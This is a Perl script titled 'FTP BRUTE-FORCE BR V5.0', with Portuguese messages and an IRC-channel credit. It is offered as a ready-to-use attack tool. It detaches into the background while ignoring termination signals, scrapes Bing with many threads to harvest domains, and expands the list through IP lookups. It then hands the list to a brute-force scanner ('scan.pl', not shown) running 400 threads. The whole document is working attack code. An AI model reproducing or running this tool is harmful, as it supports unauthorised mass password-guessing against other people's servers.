FTP BRUTE-FORCE BR V5.0

1. #!/usr/bin/perl
2.  
3. # FTP BRUTE-FORCE BR V5.0
4. # irc.priv8.jp #priv8
5.  
6. use threads;
7. use threads::shared;
8. use Thread::Queue;
9. use Thread::Semaphore;
10. use HTTP::Headers;
11. use HTTP::Request;
12. use HTTP::Response;
13. use LWP::UserAgent;
14. use HTTP::Cookies;
15. use Socket;
16.  
17.  
18.  
19. if (!$ARGV[1]) {
20. print "Modo de uso:\nperl $0 <wordlist> <threads>\n";
21. exit();
22. }
23. $SIG{"INT"} = "IGNORE";
24. $SIG{"HUP"} = "IGNORE";
25. $SIG{"TERM"} = "IGNORE";
26. $SIG{"CHLD"} = "IGNORE";
27. my $pid=fork;
28. exit if $pid;
29. die "Problema com o fork: $!" unless defined($pid);
30.  
31. $|++;
32. sleep(4);
33. # inicialização de variaveis
34. my $q = Thread::Queue->new();
35. my $semaphore = Thread::Semaphore->new();
36.  
37. my $word = $ARGV[0];
38. my $max_threads = $ARGV[1];
39. my @wordlist = ();
40. my $arq; #file pointer
41. my $conta_linha = 0;
42. my %rep = ();
43.  
44. our $xs : shared = 0;
45.  
46. # processamento da wordlist
47. print "[+] Loading wordlist, please wait\n";
48.  
49. open($arq, "<$word") or die "$!\n";
50. while (<$arq>) {
51. my $linha = $_;
52. chomp $linha;
53. push(@wordlist, $linha);
54. $conta_linha++;
55. }
56. close($arq);
57. print "[+] Foram carregadas $conta_linha palavras.\n[+] Iniciando buscas...\n";
58.  
59.  
60. #inicio da busca
61. &threadnize("search", @wordlist);
62. #fim da busca
63.  
64. print "\n[+] Removendo sites repetidos\n";
65. $conta_linha = 0;
66. open($arq, "<sites.txt") or die "$!\n";
67. while (<$arq>) {
68. my $linha = $_;
69. chomp $linha;
70. if (!$rep{$linha}) {
71. $rep{$linha} = 1;
72. $conta_linha++;
73. }
74. }
75. close($arq);
76.  
77.  
78. open($arq, ">sites.txt") or die "$!\n";
79. foreach my $key (keys %rep){
80. print $arq $key . "\n";
81. }
82. close($arq);
83.  
84. $conta_linha = 0;
85. my @wordlist2 = ();
86. print "[+] Carregando lista de sites para resolver ip e buscar mais dominios\n";
87. open($arq, "<sites.txt") or die "$!\n";
88. while (<$arq>) {
89. my $linha = $_;
90. chomp $linha;
91. push(@wordlist2, $linha);
92. }
93. close($arq);
94. $xs = 0;
95.  
96. &threadnize("dns", @wordlist2);
97.  
98.  
99. print "\n[+] Removendo sites repetidos\n";
100. %rep = ();
101. open($arq, "<sites.txt") or die "$!\n";
102. while (<$arq>) {
103. my $linha = $_;
104. chomp $linha;
105. if (!$rep{$linha}) {
106. $rep{$linha} = 1;
107. $conta_linha++;
108. }
109. }
110. close($arq);
111.  
112.  
113. open($arq, ">sites.txt") or die "$!\n";
114. foreach my $key (keys %rep){
115. print $arq $key . "\n";
116. }
117. close($arq);
118.  
119. print "[+] Total de sites encontrados: $conta_linha\n";
120. print "[+] iniciando bruteforce com 400 threads\n";
121. system("perl scan.pl sites.txt 400");
122.  
123.  
124.  
125.  
126.  
127.  
128.  
129. ######################### SUBS #################################
130.  
131.  
132. sub search(){
133. while($q->pending() > 0){
134. $semaphore->down();
135. my $search = $q->dequeue;
136. $semaphore->up();
137. next if(not defined $search);
138.  
139.  
140. my $x = 0;
141. my $y = 701;
142. my ($bing, $response) = "";
143. my %sites = ();
144. for($x=0; $x <= $y; $x+=10){
145. $bing = 'http://www.bing.com/search?q='.$search.'&first='.$x.'&FORM=PORE';
146. $response = &GET($bing);
147. while ($response =~ m/<cite>(.*?)<\/cite>/g){
148. my $site = $1;
149. $site =~s/<strong>|<\/strong>//g;
150. $site = substr($site, 0, index($site, '/')) if($site =~/\//);
151. if(!$sites{$site}){
152. $sites{$site} = 1 if($site =~/^[a-zA-Z0-9\.\-]+$/);
153. }
154. }
155. $y = 10 * &getmax($response) + 1;
156. }
157. my $si = "";
158. foreach my $key (keys %sites){
159. $si .= $key . "\n";
160. $semaphore->down();
161. $xs++;
162. $semaphore->up();
163. }
164. my $a;
165. $semaphore->down();
166. open($a, ">>sites.txt");
167. print $a $si;
168. close($a);
169. print "[+] sites encontrados: [$xs] buscas restantes [". $q->pending ."] \r";
170. $semaphore->up();
171. }
172.  
173. }
174.  
175.  
176.  
177.  
178.  
179. sub search2(){
180. my $search = shift;
181. my $x = 0;
182. my $y = 701;
183. my ($bing, $response) = "";
184. my %sites = ();
185. for($x=0; $x <= $y; $x+=10){
186. $bing = 'http://www.bing.com/search?q='.$search.'&first='.$x.'&FORM=PORE';
187. $response = &GET($bing);
188. while ($response =~ m/<cite>(.*?)<\/cite>/g){
189. my $site = $1;
190. $site =~s/<strong>|<\/strong>//g;
191. $site = substr($site, 0, index($site, '/')) if($site =~/\//);
192. if(!$sites{$site}){
193. $sites{$site} = 1 if($site =~/^[a-zA-Z0-9\.\-]+$/);
194. }
195. }
196. $y = 10 * &getmax($response) + 1;
197. }
198. my $si = "";
199. foreach my $key (keys %sites){
200. $si .= $key . "\n";
201. $semaphore->down();
202. $xs++;
203. $semaphore->up();
204. }
205. my $a;
206. $semaphore->down();
207. open($a, ">>sites.txt");
208. print $a $si;
209. close($a);
210. print "[+] sites encontrados: [$xs] buscas restantes [". $q->pending ."] \r";
211. $semaphore->up();
212. }
213.  
214.  
215.  
216.  
217.  
218.  
219.  
220. sub getmax(){
221. my $content = shift;
222. my $max = 0;
223. while($content =~m/<li><a href="\/search\?q=.+">(\d+)<\/a><\/li>/g){
224. $max = $1;
225. }
226. return $max;
227. }
228.  
229.  
230.  
231. sub threadnize(){
232. my ($fun, @tests) = @_;
233. @_=();
234. foreach my $test (@tests){
235. $q->enqueue($test) if($test);
236. }
237. my $x=0;
238. my @threads = ();
239. while($q->pending() > 0 && $x <= $max_threads-1){
240. no strict 'refs';
241. push @threads, threads->new(\&{$fun});
242. $x++;
243. }
244.  
245. sleep(2);
246. foreach my $running (@threads) {
247. $running->join();
248. }
249. @threads = ();
250. }
251.  
252.  
253.  
254. sub GET(){
255. my $url1 = shift;
256. return 0 if(!$url1);
257. return 0 if($url1 !~/^https?:\/\//);
258. my $headers = HTTP::Headers->new();
259. $headers->remove_header('Connection');
260. $headers->header('Accept' => "text/html, application/xhtml+xml, application/xml",
261. 'Accept-Language' => "en-US,en",
262. 'Accept-Encoding' => "gzip, deflate",
263. 'Connection' => "Keep-alive",
264. 'Keep-Alive' => 30);
265.  
266. my $req = HTTP::Request->new('GET', $url1, $headers);
267. my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7", ssl_opts => { verify_hostname => 0} );
268.  
269. $ua->timeout(15);
270. $ua->max_size(1024000);
271. $ua->protocols_allowed( [ 'http'] );
272. my $response=$ua->request($req);
273. my $code = $response->code;
274. if($response->is_success){
275. return $response->decoded_content;
276. }
277. elsif($code == 404){
278. return "error";
279. }
280. else{
281. return $code;
282. }
283.  
284. }
285.  
286.  
287.  
288. sub dns(){
289. while($q->pending() > 0){
290. $semaphore->down();
291. my $url = $q->dequeue;
292. $semaphore->up();
293.  
294.  
295. my $ip = join(".", unpack("C4", (gethostbyname($url))[4]));
296. if (defined($ip)) {
297. &search2("ip:$ip") if(length($ip) > 6 && $ip =~/^\d+\.\d+\.\d+\.\d+$/);
298. }
299. undef $ip;
300.  
301.  
302. }
303. }